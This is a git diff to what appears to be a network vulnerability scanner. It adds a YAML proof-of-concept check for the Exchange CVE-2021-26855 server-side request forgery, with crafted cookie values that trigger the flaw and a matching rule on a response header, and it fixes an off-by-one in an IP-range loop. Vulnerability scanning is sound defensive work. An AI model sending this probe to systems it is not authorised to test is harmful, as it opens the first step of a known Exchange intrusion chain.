diff --git a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
new file mode 100644
index 0000000..6b80262
--- /dev/null
+++ b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
@@ -0,0 +1,14 @@
+name: poc-yaml-exchange-cve-2021-26855-ssrf
+rules:
+  - method: GET
+    path: /owa/auth/x.js
+    headers:
+      Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
+    follow_redirects: false
+    expression: |
+      response.headers["X-CalculatedBETarget"].icontains("localhost")
+detail:
+  author: sharecast
+  Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
+  links:
+    - https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse
\ No newline at end of file
diff --git a/common/ParseIP.go b/common/ParseIP.go
index 4716ed2..5ae5649 100644
--- a/common/ParseIP.go
+++ b/common/ParseIP.go
@@ -131,7 +131,7 @@ func ParseIPC(ip string) ([]string, error) {
 		}
 		startNum := start[0]<<24 | start[1]<<16 | start[2]<<8 | start[3]
 		endNum := end[0]<<24 | end[1]<<16 | end[2]<<8 | end[3]
-		for num := startNum; num < endNum; num++ {
+		for num := startNum; num <= endNum; num++ {
 			ip := strconv.Itoa((num>>24)&0xff) + "." + strconv.Itoa((num>>16)&0xff) + "." + strconv.Itoa((num>>8)&0xff) + "." + strconv.Itoa((num)&0xff)
 			AllIP = append(AllIP, ip)
 		}